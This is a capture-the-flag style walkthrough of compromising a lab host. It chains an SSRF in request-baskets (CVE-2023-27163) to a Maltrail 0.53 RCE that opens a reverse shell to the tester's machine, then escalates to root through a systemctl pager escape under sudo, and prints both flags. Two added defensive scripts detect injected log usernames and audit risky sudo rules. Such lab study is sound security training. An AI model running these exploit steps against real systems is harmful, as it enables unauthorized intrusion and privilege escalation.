Proof of Concept
10.129.20.178
Nmap
PORT STATE SERVICE
22/tcp open ssh
55555/tcp open unknown
Initial Access
After opening the web service at http://10.129.20.178:5555, the page source shows that the “request-baskets 1.2.1” service is in use
request-baskets 1.2.1 is affected by an SSRF vulnerability (CVE-2023-27163)
Downloaded POC
┌──(kali㉿kali)-[~/Sau]
└─$ git clone https://github.com/madhavmehndiratta/CVE-2023-27163.git
Cloning into 'CVE-2023-27163'...
remote: Enumerating objects: 6, done.
remote: Counting objects: 100% (6/6), done.
remote: Compressing objects: 100% (5/5), done.
remote: Total 6 (delta 0), reused 3 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (6/6), done.
Use the SSRF vulnerability to create a URL that reaches port 80, which is only accessible from inside the host
┌──(kali㉿kali)-[~/Sau/CVE-2023-27163]
└─$ python CVE-2023-27163.py http://10.129.20.178:55555 http://127.0.0.1:80
Creating a proxy basket zbrrhb...
Basket Created!
Accessing the http://10.129.20.178:55555/zbrrhb makes the server request to http://127.0.0.1:80
Authorization Token: CkO85WLROyLkbbAfCgT-2lMqVfdS0W3DFPVliaXIggGI
The internally reachable port 80 is running the “maltrail 0.53” service
┌──(kali㉿kali)-[~/Sau/CVE-2023-27163]
└─$ curl http://10.129.20.178:55555/zbrrhb
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta http-equiv="Content-Type" content="text/html;charset=utf8">
<meta name="viewport" content="width=device-width, user-scalable=no">
<meta name="robots" content="noindex, nofollow">
<title>Maltrail</title>
<link rel="stylesheet" type="text/css" href="css/thirdparty.min.css">
<link rel="stylesheet" type="text/css" href="css/main.css">
<link rel="stylesheet" type="text/css" href="css/media.css">
<script type="text/javascript" src="js/errorhandler.js"></script>
<script type="text/javascript" src="js/thirdparty.min.js"></script>
<script type="text/javascript" src="js/papaparse.min.js"></script>
</head>
<body>
<div id="header_container" class="header noselect">
<div id="logo_container">
<SNIP
<div id="bottom_blank"></div>
<div class="bottom noselect">Powered by <b>M</b>altrail (v<b>0.53</b>)</div>
<ul class="custom-menu">
<li data-action="hide_threat">Hide threat</li>
<li data-action="report_false_positive">Report false positive</li>
</ul>
<script defer type="text/javascript" src="js/main.js"></script>
</body>
</html>
Maltrail 0.53 has an RCE vulnerability
Downloaded POC
┌──(kali㉿kali)-[~/Sau]
└─$ git clone https://github.com/apaz-dev/Maltrail-v0.53-RCE.git
Cloning into 'Maltrail-v0.53-RCE'...
remote: Enumerating objects: 24, done.
remote: Counting objects: 100% (24/24), done.
remote: Compressing objects: 100% (21/21), done.
remote: Total 24 (delta 8), reused 9 (delta 3), pack-reused 0 (from 0)
Receiving objects: 100% (24/24), 6.13 KiB | 897.00 KiB/s, done.
Resolving deltas: 100% (8/8), done.
Start an nc reverse shell listener on port 4444
┌──(kali㉿kali)-[~/Sau]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
Run POC
┌──(kali㉿kali)-[~/Sau/Maltrail-v0.53-RCE]
└─$ ./exploit.sh -t http://10.129.20.178:55555/zbrrhb -i 10.10.14.17
[*] Start listen from ip 10.10.14.17 on port 4444
Reverse shell connected
┌──(kali㉿kali)-[~/Sau]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.17] from (UNKNOWN) [10.129.20.178] 59056
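Added detection example, not part of the original writeup: the trail.service process tree shown later in this writeup has Maltrail passing the submitted username to `logger -p auth.info -t "maltrail[882]" "Failed p>` through /bin/sh, so an injected username also lands in the auth log (or breaks the line). The script scans constructed syslog lines (assumed format, not captured from the target) for Maltrail entries whose username carries shell metacharacters or that no longer match the expected template.

```python
import re

# Assumed log line format (not captured from the target): Maltrail's httpd calls
# `logger -p auth.info -t "maltrail[<pid>]" "<Failed|Accepted> password for <user> from <ip> port <port>"`
# through /bin/sh, as the truncated command in the trail.service process tree shows, so
# whatever was submitted as the username reaches syslog verbatim (or truncates the line).
MALTRAIL_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) maltrail\[(?P<pid>\d+)\]: "
    r"(?P<result>Failed|Accepted) password for (?P<user>.*) from (?P<src>\S+) port (?P<port>\d+)$"
)
# Characters a login name never needs but a shell-injected one does.
SHELL_META = re.compile(r"[;`|&$(){}<>\\]")

# Constructed sample auth.log lines; line 3 carries a command substitution in the
# username, line 5 is a Maltrail entry that the injection left truncated.
SAMPLE_LOG = """\
Feb 11 14:20:03 sau maltrail[882]: Failed password for admin from 10.129.1.5 port 50122
Feb 11 14:21:17 sau maltrail[882]: Accepted password for admin from 10.129.1.5 port 50130
Feb 11 15:57:40 sau maltrail[882]: Failed password for ;`id`; from 10.10.14.17 port 59010
Feb 11 15:57:41 sau sshd[1402]: Failed password for root from 10.10.14.17 port 59011 ssh2
Feb 11 15:58:30 sau maltrail[882]: Failed password for
"""


def scan_auth_log(text):
    """Return (line_no, reason, line) for each suspicious Maltrail auth entry."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if "maltrail[" not in line:
            continue  # other daemons (sshd etc.) are out of scope here
        m = MALTRAIL_RE.match(line)
        if m is None:
            findings.append((n, "malformed maltrail auth line", line))
        elif SHELL_META.search(m.group("user")):
            findings.append((n, "shell metacharacters in username", line))
    return findings


if __name__ == "__main__":
    for n, reason, line in scan_auth_log(SAMPLE_LOG):
        print(f"line {n}: {reason}: {line}")
```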
$
Read user.txt
$ cat user.txt
cat user.txt
09fc6f298d333bdfa5448c1a0d37e917
$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b0:c1:1d brd ff:ff:ff:ff:ff:ff
inet 10.129.20.178/16 brd 10.129.255.255 scope global dynamic eth0
valid_lft 2937sec preferred_lft 2937sec
inet6 dead:beef::250:56ff:feb0:c11d/64 scope global dynamic mngtmpaddr
valid_lft 86396sec preferred_lft 14396sec
inet6 fe80::250:56ff:feb0:c11d/64 scope link
valid_lft forever preferred_lft forever
Privilege Escalation
Confirmed that “/usr/bin/systemctl status trail.service” can be run with sudo privileges
puma@sau:~/.gnupg$ sudo -l
sudo -l
Matching Defaults entries for puma on sau:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User puma may run the following commands on sau:
(ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
Run “/usr/bin/systemctl status trail.service” as root
puma@sau:~/.gnupg$ sudo /usr/bin/systemctl status trail.service
sudo /usr/bin/systemctl status trail.service
● trail.service - Maltrail. Server of malicious traffic detection system
Loaded: loaded (/etc/systemd/system/trail.service; enabled; vendor preset:>
Active: active (running) since Wed 2026-02-11 14:18:11 UTC; 1h 39min ago
Docs: https://github.com/stamparm/maltrail#readme
https://github.com/stamparm/maltrail/wiki
Main PID: 882 (python3)
Tasks: 18 (limit: 4662)
Memory: 40.5M
CGroup: /system.slice/trail.service
├─ 882 /usr/bin/python3 server.py
├─1243 /bin/sh -c logger -p auth.info -t "maltrail[882]" "Failed p>
├─1244 /bin/sh -c logger -p auth.info -t "maltrail[882]" "Failed p>
├─1253 sh
├─1254 python3 -c import socket,os,pty;s=socket.socket(socket.AF_I>
├─1255 /bin/sh
├─1258 /bin/sh -c logger -p auth.info -t "maltrail[882]" "Failed p>
├─1259 /bin/sh -c logger -p auth.info -t "maltrail[882]" "Failed p>
├─1262 sh
├─1263 python3 -c import socket,os,pty;s=socket.socket(socket.AF_I>
├─1264 /bin/sh
├─1280 script -qc /bin/bash /dev/null
├─1281 /bin/bash
├─1319 sudo /usr/bin/systemctl status trail.service
lines 1-23
Type “!sh” to spawn a shell
puma@sau:~/.gnupg$ sudo /usr/bin/systemctl status trail.service
sudo /usr/bin/systemctl status trail.service
● trail.service - Maltrail. Server of malicious traffic detection system
Loaded: loaded (/etc/systemd/system/trail.service; enabled; vendor preset:>
Active: active (running) since Wed 2026-02-11 14:18:11 UTC; 1h 40min ago
Docs: https://github.com/stamparm/maltrail#readme
https://github.com/stamparm/maltrail/wiki
Main PID: 882 (python3)
Tasks: 18 (limit: 4662)
Memory: 40.5M
CGroup: /system.slice/trail.service
├─ 882 /usr/bin/python3 server.py
├─1243 /bin/sh -c logger -p auth.info -t "maltrail[882]" "Failed p>
├─1244 /bin/sh -c logger -p auth.info -t "maltrail[882]" "Failed p>
├─1253 sh
├─1254 python3 -c import socket,os,pty;s=socket.socket(socket.AF_I>
├─1255 /bin/sh
├─1258 /bin/sh -c logger -p auth.info -t "maltrail[882]" "Failed p>
├─1259 /bin/sh -c logger -p auth.info -t "maltrail[882]" "Failed p>
├─1262 sh
├─1263 python3 -c import socket,os,pty;s=socket.socket(socket.AF_I>
├─1264 /bin/sh
├─1280 script -qc /bin/bash /dev/null
├─1281 /bin/bash
├─1338 sudo /usr/bin/systemctl status trail.service
lines 1-23!!sh
!sh
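Added hardening check, not from the original writeup: the sudo rule abused above lets `systemctl status` hand its output to a pager, and `!sh` typed at the pager runs as root. The script parses `sudo -l` output (the writeup's own output embedded as sample input) and flags pager-capable commands that lack `--no-pager`, printing the corrected rule; the PAGER_TOOLS table is my assumption, not something sudo or systemd publishes.

```python
import re

# Commands that page their output through less by default; from less, "!sh" runs a
# shell as the sudo target user. This table is my assumption, not from sudo or systemd.
PAGER_TOOLS = {
    "systemctl": "--no-pager",
    "journalctl": "--no-pager",
    "less": None, "more": None, "man": None,   # no safe form: the command is the pager
}

# `sudo -l` output as shown in the writeup above; env_reset means puma cannot export
# SYSTEMD_PAGER=cat to avoid the pager, so the rule itself must carry --no-pager.
SUDO_L = """\
Matching Defaults entries for puma on sau:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin
User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
"""

RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>/\S.*)$")


def audit_sudo_rules(text):
    """Return a finding per sudo rule that can drop the caller into an interactive pager."""
    findings = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True      # rules follow the "User X may run ..." header
            continue
        m = RULE_RE.match(line) if in_rules else None
        if m is None:
            continue
        argv = m.group("cmd").split()
        tool = argv[0].rsplit("/", 1)[-1]
        if tool not in PAGER_TOOLS:
            continue
        flag = PAGER_TOOLS[tool]
        if flag and flag in argv[1:]:
            continue             # already hardened
        fix = (" ".join([argv[0], flag] + argv[1:]) if flag
               else "remove the rule or wrap the command in a script that pipes to cat")
        findings.append({"runas": m.group("runas"), "nopasswd": "NOPASSWD" in m.group("tags"),
                         "cmd": m.group("cmd"), "fix": fix})
    return findings


if __name__ == "__main__":
    for f in audit_sudo_rules(SUDO_L):
        print(f"pager escape possible: {f['cmd']}  ->  {f['fix']}")
```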
#
Read root.txt
# cat root.txt
cat root.txt
f432255ea7c0caeae9fcd5f0bfcef780
# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b0:c1:1d brd ff:ff:ff:ff:ff:ff
inet 10.129.20.178/16 brd 10.129.255.255 scope global dynamic eth0
valid_lft 2386sec preferred_lft 2386sec
inet6 dead:beef::250:56ff:feb0:c11d/64 scope global dynamic mngtmpaddr
valid_lft 86394sec preferred_lft 14394sec
inet6 fe80::250:56ff:feb0:c11d/64 scope link
valid_lft forever preferred_lft forever